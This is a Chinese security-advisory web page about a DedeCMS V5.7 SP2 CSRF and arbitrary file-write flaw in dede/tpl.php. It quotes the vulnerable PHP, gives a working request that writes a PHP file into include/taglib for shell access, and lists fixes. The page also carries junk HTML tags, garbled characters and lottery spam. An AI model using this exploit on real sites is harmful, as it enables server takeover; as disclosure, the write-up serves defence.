• <dl id="06azv"></dl>

      <li id="06azv"></li>

          1. <dl id="06azv"></dl>

              <dl id="06azv"><ins id="06azv"></ins></dl>
              <dl id="06azv"><ins id="06azv"><thead id="06azv"></thead></ins></dl>

                <dl id="06azv"><ins id="06azv"></ins></dl>
              1. <li id="06azv"></li>

                <dl id="06azv"><s id="06azv"></s></dl>
                <li id="06azv"><ins id="06azv"><thead id="06azv"></thead></ins></li>

              2. <li id="06azv"><ins id="06azv"><strong id="06azv"></strong></ins></li>
                <dl id="06azv"></dl>

              3. <dl id="06azv"></dl>

                  <form id="06azv"></form>
                  1. <li id="06azv"><ins id="06azv"></ins></li>

                    1. <output id="06azv"></output>

                      代理?#29992;?/b> 2019全新代理计划 赚钱+省钱双管齐下,独立平台,丰厚利润!

                      您现在的位置: 秀站网 > 织梦大学 > 织梦安全 >

                      dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

                      来源:未知 发布时间:2019-04-02热度:我要评论
                      DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,存在CSRF漏洞,通过申请友情链接的方式,诱使管理员点击,从而从 Referer 中拿到 后台路径,进而以管理员的身份写一句话到服务器上 GetShell 。...

                      DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。?#25910;?#26159;2018年2月28日在官网下载的DedeCMS V5.7 SP2版本程序,截至发稿,漏洞依然存在。

                      漏洞详情

                      织?#25991;?#35748;的后台地址是/dede/,当然?#37096;梢员?#26356;?#27169;?#21040;时候根据网站具体情况替换默认后台地址即可。

                      dede/tpl.php中第251行到281行

                       

                      csrf_check();

                       

                      if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))

                       

                      {

                       

                          ShowMsg('文件名不合法,不允许进行操作!', '-1');

                       

                          exit();

                       

                      }

                       

                      require_once(DEDEINC.'/oxwindow.class.php');

                       

                      $tagname = preg_replace("#\.lib\.php$#i", "", $filename);

                       

                      $content = stripslashes($content);

                       

                      $truefile = DEDEINC.'/taglib/'.$filename;

                       

                      $fp = fopen($truefile, 'w');

                       

                      fwrite($fp, $content);

                       

                      fclose($fp);

                       

                      1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。

                      2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所?#21592;?#39035;要.lib.php结尾。

                      注意: 这里还有一个csrf_check()函数,即请求中必须要带token参数。

                      漏洞利用

                      1.首先获取token 访问 域名 + /dede/tpl.php?action=upload。在页面源代码中获取到token值 

                      dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

                      然后访问 :

                      域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

                      dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

                      shell:域名 + /include/taglib/moonsec.lib.php

                      漏洞修复

                      1.禁止/include/taglib/此处写入文件。

                      2.过滤恶意标签

                      3.?#22659;齞ede/tpl.php 文件

                      本文地址:http://www.lrwh.tw/dedecms_aq/1616.html

                        责任编辑:秀站网

                        发表评论

                        评论列表(条)

                          云南11选五5走势图